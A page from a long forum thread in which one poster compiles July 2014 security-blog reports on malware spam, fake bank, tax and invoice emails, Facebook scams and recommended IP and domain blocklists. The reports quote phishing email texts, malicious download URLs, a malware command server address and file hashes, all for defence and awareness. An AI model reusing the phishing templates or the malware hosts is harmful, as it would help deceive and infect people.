Page 49 of 132 FirstFirst ... 394546474849505152535999 ... LastLast
Results 481 to 490 of 1320

Thread: SPAM frauds, fakes, and other MALWARE deliveries...

  1. #481
    Adviser Team AplusWebMaster's Avatar
    Join Date
    Oct 2005
    Location
    USA
    Posts
    6,881

    Thumbs down Something evil on 188.120.198.1 ...

    FYI...

    Something evil on 188.120.198.1 - (IP4ISP / LuckyNet, Czech Republic)
    - http://blog.dynamoo.com/2014/07/some...81-ip4isp.html
    21 July 2014 - "... Cushion Redirect sites closely related to this attack a few weeks ago* but this time hosted on 188.120.198.1 (IP4ISP / LuckyNet, Czech Republic). You can see the -redirect- in action in this URLquery report** and VirusTotal*** has a clear indication of badness on this IP. All the sites are -hijacked- subdomains of legitimate domains, a peculiar mix of pornography and Dora the Explorer... the most effective way of securing your network is to permablock 188.120.198.1.
    Recommended blocklist:
    188.120.198.1
    e-meskiesprawy24 .com.pl
    dora-explorer .co.uk
    adultvideoz .net
    alsancakescort .org
    anadoluyakasiescort .asia
    "
    * http://blog.dynamoo.com/2014/07/some...vh-france.html

    ** http://urlquery.net/report.php?id=1405937345878

    *** 188.120.198.1: https://www.virustotal.com/en-gb/ip-...1/information/
    ___

    Facebook video scam leaves unamusing Trojan
    - http://net-security.org/malware_news.php?id=2814
    21.07.2014 - "... video spreading on Facebook leaves a not-so-hilarious Trojan in its wake on users’ computers, according to research by Bitdefender. The malware, believed to originate from Albania, can access a large amount of data from the user’s internet browser. The scam begins with what appears to be a funny video of a Facebook friend. Once the video is clicked on, users are directed to a fake YouTube page, which then -redirects- them to a malicious Flash Player.exe for an Adobe update... Malware writers faked the number of views so the video seems to have been watched by over a million users... In an attempt to bypass security, the hackers got their hands on over 60 bit.ly API keys that helped them generate shortened URLs. The unique links are then spread on Facebook timelines. As API keys are randomly selected, blacklisting a couple does not stop the scam from spreading. Bitdefender has notified bit.ly of the issue. The malware writers used an add-on framework that allows their code to function on several browsers. With Google Chrome, the malicious YouTube video -redirects- users to a fake FlashPlayer install. The file, detected by Bitdefender as Trojan.Agent.BDYV, drops a password-protected archive on the computer and a .bat file, designed to run the executable in the archive after providing the password as a parameter. With Firefox, the page prompts for a malicious add-on install. On both browsers, the add-on tags 20 Facebook friends at a time and injects ad services into the page. The extension also fiddles with some of the social network’s functionalities so that users can't delete the malicious posts from their timeline and activity log..."
    ___

    Bank of America - Activity Alert Spam
    - http://threattrack.tumblr.com/post/9...ity-alert-spam
    July 21, 2014 - "Subjects Seen:
    Activity Alert: A Check Exceeded Your Requested Alert Limit
    Typical e-mail details:
    Activity Alert
    A check exceeded your requested alert limit
    We’re letting you know a check written from your account went over the limit you set for this alert.
    For more details please check attached file


    Malicious File Name and MD5:
    report072114_349578904357.exe (23E32D6A9A881754F1260899CB07AC55)
    report072114_349578904357.zip (4FE1365C55AA0C402384F068CDA7DF8E)


    Screenshot: https://gs1.wac.edgecastcdn.net/8019...lop1r6pupn.png

    Tagged: Bank of America, Upatre

    - http://myonlinesecurity.co.uk/activi...e-pdf-malware/
    21 July 2014
    > https://www.virustotal.com/en/file/e...is/1405960609/
    ___

    Bitly API key and MSNBC unvalidated redirects
    - http://community.websense.com/blogs/...redirects.aspx
    21 Jul 2014 - "... observed a -spam/fraud- campaign whereby a user is -redirected- from a real news site to a -fake- news site. In this case the real site is msnbc.com, which belongs to the well-known cable and satellite channel MSNBC. We have discovered that cyber criminals appear to have gained access to the publicly available MSNBC Bitly API key. This is being abused to create custom URL shorteners. Websense Security Labs has been tracking fraudulent sites of this kind since 2012, but this was the first time that a redirection technique of this type was observed. Executive Summary: The various methods used by this group include:
    - Use of publicly available Bitly API key for redirection
    - Use of a famous news site to redirect to a fake news site
    - Four redirection steps from real news site to fake news site
    - Spreading the link through Google and Yahoo groups and spam mail
    Here is the -fake- news site to which the user is directed, hosted on a legitimate-looking host of hxxp ://fcxnws .com/:
    > http://community.websense.com/cfs-fi...2D00_550x0.jpg
    So far, Websense Security Labs has identified that the spam is spread through Google and Yahoo groups, and email. Example post on Google groups:
    > http://community.websense.com/cfs-fi...2D00_550x0.jpg
    Example post on Yahoo groups:
    > http://community.websense.com/cfs-fi...2D00_550x0.jpg
    ... Bitly is a service to shorten URLs into a more user-friendly format. Shortened URLs are very convenient as they are easier to exchange due to their length, and can improve the look of a message. Businesses can set up their own 'short domains' and change their DNS settings to Bitly's servers. Each Bitly customer has their own API key that they can use to generate short URLs from full URLs. If the API key relates to an account that has set up their own short domain, the custom short domain will be used when generating a short URL... Bitly are currently blocking the redirection page at the time of writing. Kudos to them.
    >> http://community.websense.com/cfs-fi...2D00_550x0.jpg
    ... Websense Security Labs identified other websites that keep their Bitly API key in public view. Exposing your Bitly API key is a risk if you have a short domain, as it allows anybody to generate short URLs on your short domain that redirect to anywhere of that person's choosing. This can make it appear as if your business is the one redirecting to malware/phishing/fraud etc. Fortunately, there's not much more that anybody can do with an API key as any account-related or link editing features can only be accessed after an OAuth login. All requests to the Bitly API should be done on the website's back end, on the server-side. This means that the API key will never be seen by public users on the front end and your API key remains safe. You can read about Bitly's API best practices here: http://dev.bitly.com/best_practices.html . URL shorteners are very useful, but come with their own security risks and should be used with caution from a developer and from a user point of view."

    Last edited by AplusWebMaster; 2014-07-22 at 06:53.
    The machine has no brain.
    ......... Use your own.
    Browser check for updates here.
    YOU need to defend against -all- vulnerabilities.
    Hacks only need to find -1- to get in...
    .

  2. #482
    Adviser Team AplusWebMaster's Avatar
    Join Date
    Oct 2005
    Location
    USA
    Posts
    6,881

    Thumbs down Facebook SCAMs, Tumblr SPAM apps...

    FYI...

    Facebook SCAM - 'Actual Footage Missile MH-17'
    - http://www.hoax-slayer.com/footage-m...vey-scam.shtml
    July 22, 2014 - "Facebook message claims that users can see actual footage of the missile fired at downed Malaysian Airlines flight MH17 by pro-Russian militants. The promised video does not exist. The message is a -scam- designed to trick people into spamming their friends with the same fake material and participating in -bogus- online surveys. If this message comes your way, do not click any links that it contains.
    > http://www.hoax-slayer.com/images/fo...vey-scam-1.jpg
    This message, which is being distributed on Facebook, promises users actual footage showing the missile that destroyed Malaysian Airlines flight MH17. The message invites users to click a link to view the footage... The supposed video is just a trick to get you to click the link in the message. In fact, the message is a typical 'shocking video' survey scam. If you click the link in the message, you will be taken to a fake Facebook Page that supposedly hosts the video. The fake page comes complete with equally fake user comments... scammers quickly exploit every high-profile disaster and the MH17 tragedy is no exception. In coming days and weeks, be wary of any message that asks you to click a link to access video or breaking news pertaining to MH17..."
    ___

    Facebook Scam leads to Nuclear Exploit Kit
    - http://www.symantec.com/connect/fr/b...ar-exploit-kit
    22 July 2014 - "... The “EXPOSED: Mom Makes $8,000/Month” scam, which we observed recently, redirected users to the Nuclear exploit kit. This particular scam has since been removed by Facebook..."
    Regions affected by Nuclear exploit kit
    > http://www.symantec.com/connect/site...20Scam%204.png
    ___

    Spammy Tumblr Apps and Stalker Hunting
    - http://blog.malwarebytes.org/fraud-s...alker-hunting/
    July 22, 2014 - "... the latest one currently bouncing around the popular social network. You’ll notice it apes the template of the site in the linked blog [1] – same spam posts, same spam application name – although the website for this one looks fairly slick. It’s possible this one is closely related to the February spamrun, as the same Bit.ly user account created shortening URLs for both. Here’s the spam popping up on various blogs:
    > http://cdn.blog.malwarebytes.org/wp-...tumbstalk1.jpg
    Below is the site it leads to, located at reviewsloft(dot)com/a/?3
    > http://cdn.blog.malwarebytes.org/wp-...tumbstalk2.jpg
    ... Once the install is done, they’ll show the inevitable surveys to the end-user to make some money. As before, a bit.ly link is used... With this current spamrun we can see that we’re hitting about 19,000 in 12 days, with around 2,000 clicks listed as coming from Tumblr and the rest classed as “unknown”. Not a huge amount of information to go on, then, but a good reminder that people continue to fall for this type of scam which has been around for the longest time. As a final note, the -rogue- application will continue to post to your Tumblr until you go into your user settings and remove the app... follow the instructions listed on the Tumblr account security page*. At that point, the spam posts can stop..."
    * https://www.tumblr.com/docs/en/account_security

    1] http://blog.malwarebytes.org/fraud-s...-tumblr-users/
    ___

    Fake Credit Applicaiton – PDF malware
    - http://myonlinesecurity.co.uk/fw-cre...e-pdf-malware/
    22 July 2014 - "Fw: Credit Application is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email reads:
    ... Please see credit application for West Star Environmental.
    The job we have for them is for $ 46,214.00
    Thank you,
    From: Jimmy Robertson
    Sent: Tue, 22 Jul 2014 11:57:13 +0100
    Subject: Credit Applicaiton
    Good Afternoon,
    Here is our credit application. If you should require further information please feel free to contact me.
    Jimmy Robertson
    West Star Environmental, Inc.
    4770 W. Jennifer
    Fresno, CA 93722 ...


    22 July 2014: SWF_CREDIT_APPLICATION.pdf.zip (10kb) Extracts to SWF_CREDIT_APPLICATION.pdf.scr... Current Virus total detections: 5/53*
    This Fw: Credit Applicaiton is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
    * https://www.virustotal.com/en/file/1...is/1406038205/
    ___

    Over 30 financial institutions defrauded by phone apps used to intercept passwords
    - http://www.reuters.com/article/2014/...0PX02T20140722
    Jul 22, 2014 - "More than 30 financial institutions in six countries have been defrauded by sophisticated criminal software that convinces bank customers to install -rogue- smartphone programs... Though many of the elements of the malicious software, including the interception of one-time passwords sent to phones, have been used elsewhere, the latest criminal campaign is unusual in that it combines many different techniques and leaves few traces... Banks in Austria, Sweden, Switzerland and Japan have all been hit, with damages somewhere in the millions of dollars... The least sophisticated part of the gang's work so far appears to be in the delivery of the software, according to a report by Trend Micro researchers*. Emails that appear to be from major retailers come with attachments that, when opened, prompt the user to download a malicious attachment of an unusual type, called a control panel item. If users do not click again, they are safe. If they do, the software goes to work and hides itself out of view of most antivirus protection. When an infected user later tries to visit the website of one of the targeted banks, the software redirects them to a -fake- site, which asks for login details and then prompts the user to download a smartphone app. That app later intercepts the one-time passwords, giving the gang both that data as well as the login information, enough to clean out an account..."
    * http://blog.trendmicro.com/trendlabs...tion-emmental/
    ___

    Scams exploit MH17 Disaster
    - http://www.hoax-slayer.com/m17-scams.shtml
    July 21, 2014 - "... callous criminals waste no time in exploiting disasters such as air-crashes, terrorist attacks, storms, or tsunamis. The MH17 missile attack tragedy is no exception. In coming days and weeks, Internet users should be wary of scam attacks that attempt to trick people into following links or opening attachments in messages that are supposedly related to MH17... callous criminals waste no time in exploiting disasters such as air-crashes, terrorist attacks, storms, or tsunamis. The MH17 missile attack tragedy is no exception. In coming days and weeks, Internet users should be wary of scam attacks that attempt to trick people into following links or opening attachments in messages that are supposedly related to MH17... after clicking such a link, you are told that, before you proceed, you must share the post, participate in a survey, install an app or browser extension, or download a video player update or other software, close the page immediately..."

    - http://blog.trendmicro.com/trendlabs...of-mh17-crash/
    July 18, 2014
    ___

    Facebook SCAM - Mercedes Benz CLA 45' Giveaway
    - http://www.hoax-slayer.com/mercedes-...ing-scam.shtml
    July 21, 2014 - "Facebook Page claims that users can win a 'Mercedes Benz CLA 45 just by liking the page, liking and sharing a promotional post... The Page is -bogus- and the competitions that it promotes are not legitimate. There are no winners and no cars are being given away. This is a like-farming scam designed to fraudulently increase the number of likes garnered by the Page. Facebook Pages with high like-numbers can later be used to perpetrate further scams to a large audience. Alternatively, the Pages may be sold on the black market to other scammers...
    > http://www.hoax-slayer.com/images/me...ing-scam-1.jpg
    According to a 'Competitions' Facebook Page that is currently being promoted across the network, you could win one of 6 Mercedes Benz CLA 45's just by liking the Page, liking and sharing a Page post... The scammers may also use the bogus Pages to perpetrate advance fee scams... the like-heavy Pages can be sold via a lucrative black market to other scammers who will repurpose it to further their own goals..."

    Last edited by AplusWebMaster; 2014-07-23 at 14:57.
    The machine has no brain.
    ......... Use your own.
    Browser check for updates here.
    YOU need to defend against -all- vulnerabilities.
    Hacks only need to find -1- to get in...
    .

  3. #483
    Adviser Team AplusWebMaster's Avatar
    Join Date
    Oct 2005
    Location
    USA
    Posts
    6,881

    Thumbs down Fake Facebook mails, Fake BBB email ...

    FYI...

    Fake Facebook mails lead to Pharma Spam
    - http://blog.malwarebytes.org/fraud-s...o-pharma-spam/
    July 23, 2014 - "... it may look as though something has gone wrong with your Facebook account, but it’s just a ruse to convince you to -click- the provided link. The message reads:
    “[Name], your messages will be deleted soon responsibly
    You haven’t been to Facebook for a few days, and a lot happened while you were away.
    Your messages will be deleted soon.”


    Clicking either the View Messages or Go to Facebook button will result in the clicker hitting a php page on a .com(dot)au URL, before being redirected to a Canadian Pharmarcy page:
    > http://cdn.blog.malwarebytes.org/wp-...7/fbpharma.jpg
    ... we do not recommend purchasing random pills from websites you’ve discovered via -fake- Facebook spam mails. No matter how urgent-sounding or laced with impending doom a mail sounds, always consider that the sender simply wants you to click through with as much speed and as little thought as possible..."
    ___

    Fake BBB complaint email – malware
    - http://myonlinesecurity.co.uk/better...laint-malware/
    23 July 2014 - "Better Business Bureau complaint is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... This version is slightly different to the usual BBB complaints emails because there is -no- attachment and they want you to click the link to download the gameover -zeus- malware binary directly:
    July 23, 2014
    Case# 5942415: Joe Russell
    Dear Company:
    As you are aware, the Better Business Bureau contacted you regarding the above-named complainant, seeking a response to this complaint. Your position is available online.
    The following URL (website address) below will take you directly to this complaint and you will be able to view the response directly on our website:
    http ://newyork.app.bbb .org/complaint/view/5942415/b/194439957f
    < http ://castlestrategies .net/css/new_7g1.exe>
    The complainant has been notified of your response.
    The BBB believes that your response adequately addresses the disputed issues and/or has exhibited a good faith effort to resolve the complaint. The complaint will close as “Administratively Judged Resolved” and our records will be updated...


    23 July 2014: new_7g1.exe Current Virus total detections: 2/53*
    ... it appears to come from a friend or is more targeted..."
    * https://www.virustotal.com/en/file/6...is/1406137574/

    184.168.152.4: https://www.virustotal.com/en-gb/ip-...4/information/

    - http://threattrack.tumblr.com/post/9...less-bill-spam
    23 July 2014
    ___

    Live SSH Brute Force Logs and New Kippo Client
    - https://isc.sans.edu/diary.html?storyid=18433
    2014-07-23 - "... a new feature we have been working on for a while, that will display live statistics on passwords used by SSH brute forcing bots. In addition, we also updated our script that will allow you to contribute data to this effort. Right now, we are supporting the kippo honeypot to collect data. This script will submit usernames, passwords and the IP address of the attacker to our system... For data we are collecting so far, see:
    - https://isc.sans.edu/ssh.html
    ... some of the passwords these scripts try out are not necessarily trivial, but they may be common enough to be worth while brute forcing targets."
    ___

    Fake "Redirected message" SPAM ...
    - http://blog.dynamoo.com/2014/07/birm...edirected.html
    23 July 2014 - "This spam pretends to be from a journalist called Paul Fulford at the Birmingham Mail. However, it isn't.. it is a forgery with a malicious attachment.
    Date: Wed, 23 Jul 2014 20:59:48 +0800 [08:59:48 EDT]
    From: Birminghammail [paul.fulford@ birminghammail .co.uk]
    Subject: Redirected message
    Dear [redacted]!
    Please find attached the original letter received by our system.


    I only have two samples of this, the originating IP addresses are:
    1.34.211.10 (HINET, Taiwan)
    117.212.18.140 (BSNL, India)
    Poor Mr Fulford thinks that his email has been hacked.. it hasn't...
    > https://3.bp.blogspot.com/-CS2tc0xdd...00/fulford.png
    Attached is an archive file 1.zip which contains a malicious executable original_letter_234389_193.scr.exe... The Malwr report* shows that this part reaches out to the following IPs:
    37.139.47.103
    37.139.47.117

    Both of these belong to Comfortel Ltd in Russia. From there another file 2.exe is download which has a VT detection rate of just 3/53**. The Malwr report is inconclusive.
    I'm not familiar with the Russian host, but having two bad IPs in close proximity makes me think that you probably want to block at least 37.139.47.0/24 or the whole 37.139.40.0/21 (almost all sites are in the /24 anyway). This netblock contains a mix of what look like legitimate Russian-language sites and obvious phishing sites."
    * https://malwr.com/analysis/NGI0MWVmM...ZjNTA0YzBiNzI/

    ** https://www.virustotal.com/en-gb/fil...is/1406127100/

    - http://myonlinesecurity.co.uk/redire...ssage-malware/
    23 July 2014
    > https://www.virustotal.com/en/file/6...is/1406126658/
    ___

    Fake invoice 4904541 July SPAM – PDF malware
    - http://myonlinesecurity.co.uk/invoic...e-pdf-malware/
    23 July 2014 - "invoice 4904541 July is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... A very plain simple email that just says:
    This email contains an invoice file attachment

    23 July 2014: invoice_4904541.zip (46 kb): Extracts to invoice_32990192.exe
    Current Virus total detections: 3/53* ...This invoice 4904541 July is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is..."
    * https://www.virustotal.com/en-gb/fil...is/1406127329/
    ___

    Some WSJ systems taken offline after cyber attack
    - http://www.reuters.com/article/2014/...0FS03N20140723
    2014.07.23 - "Computer systems containing the Wall Street Journal's news graphics were -hacked- by outside parties, according to the paper's publisher Dow Jones & Co. The systems have been taken offline to prevent the spread of attacks, but Journal officials have not found any damage to the graphics, the newspaper said citing people at the Wall Street Journal familiar with the matter. A hacker who goes by the Twitter handle of 'w0rm' allegedly posted tweets and screenshots claiming to have hacked the Journal's website and offered to sell user information and credentials needed to control the server..."

    Last edited by AplusWebMaster; 2014-07-24 at 12:18.
    The machine has no brain.
    ......... Use your own.
    Browser check for updates here.
    YOU need to defend against -all- vulnerabilities.
    Hacks only need to find -1- to get in...
    .

  4. #484
    Adviser Team AplusWebMaster's Avatar
    Join Date
    Oct 2005
    Location
    USA
    Posts
    6,881

    Thumbs down Fake Remittance, Fake Voicemail SPAM ...

    FYI...

    Fake Remittance Advisory SPAM – malware
    - http://myonlinesecurity.co.uk/remitt...email-malware/
    24 july 2014 - "Remittance Advisory Email is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email... This email doesn’t have an attachment but has a link in the body for you to click on & download the malware:
    Thursday 24 July 2014
    This is a Remitter Advice following the submission of a payment instruction by Lloyds Bank Plc.
    Please review the details of the payment here.
    <http ://dentairemalin .com/images/report934875438jdfg8i45jg_07242014.exe>
    Lloyds Banking Group plc...


    24 July 2014: report934875438jdfg8i45jg_07242014.exe
    Current Virus total detections: 5/53* ..."
    * https://www.virustotal.com/en-gb/fil...is/1406204716/

    - http://centralops.net/co/DomainDossier.aspx
    canonical name dentairemalin.com.
    addresses 217.16.10.2 ...

    217.16.10.2: https://www.virustotal.com/en-gb/ip-...2/information/

    - http://blog.dynamoo.com/2014/07/natw...ed-secure.html
    24 July 2014

    - http://threattrack.tumblr.com/post/9...emittance-spam
    July 24, 2014
    Tagged: lloyds tsb, Dyreza
    ___

    Fake VoiceMail SPAM
    - http://blog.dynamoo.com/2014/07/you-...mail-spam.html
    24 July 2014 - "This tired old malware spam is doing the rounds again.
    From: Voice Mail [voicemail_sender@local]
    Subject: You have received a new VoiceMail
    Date: Thu, 24 Jul 2014 17:31:25 +0700 [06:31:25 EDT]
    You have received a voice mail message.
    Message length is 00:03:27.


    As you might expect, the attachment VoiceMail.zip does not contain a voice mail at all, but it is a malicious executable VoiceMail.scr which has a a VirusTotal detection rate of 3/53*. The CAMAS report** and Anubis report*** shows the malware downloading an encrypted file from the followng locations:
    egozentrica .com/wp-content/uploads/2014/07/tor2800_2.7z
    reneerlaw .com/wp-content/uploads/2014/07/tor2800_2.7z
    Blocking those sites may give some protection against this malware."
    * https://www.virustotal.com/en-gb/fil...is/1406214495/

    ** http://camas.comodo.com/cgi-bin/subm...1ab360a0b0806c

    *** http://anubis.iseclab.org/?action=re...0b&format=html

    50.115.19.181: https://www.virustotal.com/en-gb/ip-...1/information/

    82.98.151.154: https://www.virustotal.com/en-gb/ip-...4/information/
    ___

    CNN News Spam
    - http://threattrack.tumblr.com/post/9...king-news-spam
    July 24, 2014 - "Subjects Seen:
    CNN Breaking News - Malaysian Boing 777
    Typical e-mail details:
    Ukraine recognizes that hit a Malaysian Boing 777
    Malaysia Airlines flight 17 shot down in Ukraine.
    FULL STORY


    Malicious URLs:
    firstfiresystems .com/images/CNN_breaking_news_read_now.exe
    Malicious File Name and MD5:
    CNN_breaking_news_read_now.exe (57D5055223344CF8814DCFC33E18D7E6)


    Screenshot: https://gs1.wac.edgecastcdn.net/8019...rEN1r6pupn.png

    Tagged: CNN, Malaysian Airlines, Dyreza, MH17

    208.69.121.22: https://www.virustotal.com/en-gb/ip-...2/information/

    Last edited by AplusWebMaster; 2014-07-24 at 19:46.
    The machine has no brain.
    ......... Use your own.
    Browser check for updates here.
    YOU need to defend against -all- vulnerabilities.
    Hacks only need to find -1- to get in...
    .

  5. #485
    Adviser Team AplusWebMaster's Avatar
    Join Date
    Oct 2005
    Location
    USA
    Posts
    6,881

    Thumbs down Fake Tax Notice, Virgin Media, Tiffany, eFax SPAM ...

    FYI...

    Fake Tax Notice SPAM
    - http://blog.dynamoo.com/2014/07/hmrc...2014-spam.html
    25 July 2014 - "This fake HMRC tax notice comes with a malicious attachment:
    Date: Fri, 25 Jul 2014 16:48:37 +0900 [03:48:37 EDT]
    From: HMRC Revenue&Customs [Rosanne@ hmrc .gov.uk]
    Reply-To: Legal Aid Agency [re-HN-WFCLL-OECGTZ@ hmrc .gov.uk]
    Dear [redacted] ,
    Please be advised that one or more Tax Notices (P6, P6B) have been issued.
    For the latest information on your Tax Notices (P6, P6B) please open attached report.
    Document Reference: 34320-289...


    Screenshot: https://4.bp.blogspot.com/-ifAUEhlyc...s1600/hmrc.png

    Attached is a file P6_rep_34320-289.zip which unZips to a folder called P6_rep(9432)_84632_732.doc which contains a malicious executable P6_rep(9432)_84632_732.doc.scr which has a VirusTotal detection rate of 4/53*. The CAMAS report** shows that a second component is downloaded from 37.139.47.167/bt/2.exe which in turn has a VirusTotal detection rate of 5/52***. The IP address of 37.139.47.167 is in the same /24 as the two other IPs mentioned here [1]. I would very strongly recommend blocking traffic to at least 37.139.47.0/24 or the whole 37.139.40.0/21 range (although there do seem to be some legitimate Russian-language sites in there)..."
    * https://www.virustotal.com/en-gb/fil...is/1406281395/

    ** http://camas.comodo.com/cgi-bin/subm...b92638ce475692

    *** https://www.virustotal.com/en-gb/fil...is/1406281708/

    1] http://blog.dynamoo.com/2014/07/birm...edirected.html
    ___

    Fake Virgin Media SPAM - PDF malware
    - http://myonlinesecurity.co.uk/help-a...e-pdf-malware/
    25 July 2014 - "Help & Advice – Virgin Media Business Virgin Media Automated Billing Reminder pretending to come from Virginmedia Business <services@ virginmediabusiness .co.uk>is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer...
    > https://t2.gstatic.com/images?q=tbn:...edia%20Web.jpg
    This e-mail has been sent you by Virgin Media to inform you that we were
    unable to process your most recent payment of bill. This might be due to
    one of the following reasons:
    A recent change in your personal information such as Name or address.
    Your Credit or Debit card has expired.
    Insufficient funds in your account.
    Cancellation of Direct Debit agreement.
    Your Card issuer did not authorize this transaction.
    To avoid Service interruption you will need to update your billing profile, failure to update your profile may lead in service cancellation and termination.
    Please fulfill attached form and send it back to our email adress...


    25 July 2014: form_19927-267.zip (85 kb): Extracts to billing_form91_4352-2105.pdf.scr
    Current Virus total detections: 5/53* ... another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
    * https://www.virustotal.com/en/file/7...is/1406293502/
    ___

    Fake Tiffany SPAM...
    - http://blog.dynamoo.com/2014/07/tiff...july-spam.html
    25 July 2014 - "This fake Tiffany & Co email has a malicious attachment:
    Date: Fri, 25 Jul 2014 17:32:38 +0800 [05:32:38 EDT]
    From: "J.Parker" [rcaukomti@ tiffany .co.uk]
    Subject: invoice 0625859 July
    Kindly open to see export License and payment invoice attached, meanwhile we sent the balance payment yesterday.
    Please confirm if it has settled in your account or you can call if there is any problem.
    Thanks
    J.parker
    Tiffany & Co.


    Attached to the message is an archive invoice copy.zip which contains a folder invoice copy in which there is a malicious file invoice copy.exe which has a VirusTotal detection rate of 9/51*. The CAMAS report** shows that the malware downloads components..."
    * https://www.virustotal.com/en-gb/fil...is/1406295906/

    ** http://camas.comodo.com/cgi-bin/subm...811ff0ea747d57
    ___

    Fake "eFax message" SPAM
    - http://blog.dynamoo.com/2014/07/efax-message-spam.html
    25 July 2014 - "Another tired old spam template leading to malware:

    Screenshot: https://3.bp.blogspot.com/-bsCXYAlIv...s1600/efax.png

    In this case the link in the email goes to verzaoficial .com/css/fax_390392029_072514.exe which downloads a file with a VirusTotal detection rate of just 1/45*. Automated analysis [pdf] is fairly inconclusive as to what it does."
    * https://www.virustotal.com/en-gb/fil...is/1406297301/

    Last edited by AplusWebMaster; 2014-07-25 at 18:08.
    The machine has no brain.
    ......... Use your own.
    Browser check for updates here.
    YOU need to defend against -all- vulnerabilities.
    Hacks only need to find -1- to get in...
    .

  6. #486
    Adviser Team AplusWebMaster's Avatar
    Join Date
    Oct 2005
    Location
    USA
    Posts
    6,881

    Thumbs down Something evil on 198.27.110.192/26 ...

    FYI...

    Something evil on 198.27.110.192/26 ...
    - http://blog.dynamoo.com/2014/07/plea...g-evil-on.html
    26 July 2014 - "... seems to refer to a Proforma Invoice rather than Π - but in fact the attachment is malware.
    Date: Fri, 25 Jul 2014 22:50:14 -0700 [01:50:14 EDT]
    From: OLINMETALS TRADING CO
    Subject: PLEASE SEND PI
    Greetings,
    Regarding our previous conversation about our urgent purchase, kindly
    find attached PI and let us know if the quantity can fit in 40ft
    container.
    kindly revise the Proforma invoice so that we can proceed with an
    advance payment as agreed.
    We look forward to your urgent response with revised proforma invoice.
    Thks & Rgds,
    OLINMETALS TRADING CO., LTD ...


    ... the attachment Order.zip contains a malicious executable klopppp890.exe which has a VirusTotal detection rate of 18/53*... malware phones home to walex2.ddob .us/sddob/gate.php on 198.27.110.200 (OVH Canada reassigned to Big Kesh, LLC, US). Looking at the domains registered on 198.27.110.200 and the surrounding IPs there do seem to be a lot of malicious ones being used as malware C&Cs... I think this is enough evidence to block the entire 198.27.110.192/26 as a precaution (although there do appear to be a small number of legitimate sites too)...
    Recommended blocklist:
    198.27.110.192/26
    xiga .us
    ddob .us
    "
    (More detail at the dynamoo URL above.)
    * https://www.virustotal.com/en-gb/fil...is/1406366678/

    Diagnostic page for AS16276 (OVH)
    - https://www.google.com/safebrowsing/...?site=AS:16276
    "... over the past 90 days, 3231 site(s)... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2014-07-26, and the last time suspicious content was found was on 2014-07-26... Over the past 90 days, we found 483 site(s) on this network... that appeared to function as intermediaries for the infection of 1070 other site(s)... this network has hosted sites that have distributed malicious software in the past 90 days. We found 930 site(s)... that infected 219349 other site(s)."
    ___

    Fake Order Notification SPAM - PDF malware
    - http://myonlinesecurity.co.uk/notifi...e-pdf-malware/
    26 July 2014 - "Notification of order is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... using an old trick to attempt to disguise the file name & fool you into thinking it is a genuine PDF by inserting loads of spaces between the pdf & the .exe:
    Dear Customer
    We have received your order and it’ll be processed for 2 business days.
    Your credit card will be charged for 803 USD.
    You can find specification of the invoice and delivery details: http ://link.vpn .by/?id=157562
    Yours truly,
    Absalon Holmes
    FG Charter Travel Company


    Todays Date: bill.2563034.zip (53 kb): Extracts to bill.2563034.PDF____________.exe
    Current Virus total detections: 1/53* . This Notification of order is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is..."
    * https://www.virustotal.com/en-gb/fil...is/1406396500/

    178.124.137.170: https://www.virustotal.com/en-gb/ip-...0/information/

    Last edited by AplusWebMaster; 2014-07-27 at 02:26.
    The machine has no brain.
    ......... Use your own.
    Browser check for updates here.
    YOU need to defend against -all- vulnerabilities.
    Hacks only need to find -1- to get in...
    .

  7. #487
    Adviser Team AplusWebMaster's Avatar
    Join Date
    Oct 2005
    Location
    USA
    Posts
    6,881

    Thumbs down Something evil on 88.198.252.168/29 ...

    FYI...

    Something evil on 88.198.252.168/29 - Ransomware
    - http://blog.dynamoo.com/2014/07/some...825216829.html
    28 July 2014 - "88.198.252.168/29 (Hetzner, Germany) is infected with a whole bunch of ransomware landing pages, like this:
    Screenshot: https://4.bp.blogspot.com/-ABIdWQUvq...600/locker.png

    In the past this IP range has been used to host a number of legitimate Austrian sites, but at the moment it appears to be hosting -ransomware- landing pages exclusively. The domains in use are a combination of crappy .in domains registered to a series of -fake- addresses, plus a bunch of subdomains of legitimate domains that have been hijacked. What is interesting about these hijacked domians is that they all use afraid .org as namerservers. This hijacking at afraid .org is because these particular domain users are using the free afraid .org service which allows anyone to create a subdomain of your domain and point is where they like (explained in this FAQ*). The bad news is that this sort of -hijacking- is a quick way to ruin your domain's reputation... Blocking these landing pages will probably not stop a PC from becoming infected with ransomware, but monitoring or blocking the following list may give you some intelligence as to what is happening on your own network.
    Recommended blocklist:
    88.198.252.168/29
    fernandocoelho .net.br
    duk66 .com
    cerone .com.ar
    gigliotti .com.ar
    clawmap .com
    lareferencedentaire .com
    izaksuljkic .tk
    ..."
    (Complete list @ the dynamoo URL above.)
    * https://freedns.afraid.org/faq/#14

    Diagnostic page for AS24940 (HETZNER-AS)
    - https://www.google.com/safebrowsing/...?site=AS:24940
    "... Of the 327849 site(s) we tested on this network over the past 90 days, 2634 site(s)... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2014-07-28, and the last time suspicious content was found was on 2014-07-28... Over the past 90 days, we found 328 site(s) on this network... that appeared to function as intermediaries for the infection of 2189 other site(s)... this network has hosted sites that have distributed malicious software in the past 90 days. We found 377 site(s)... that infected 4506 other site(s)..."
    ___

    Fake Delivery fail SPAM – PDF malware
    - http://myonlinesecurity.co.uk/delive...e-pdf-malware/
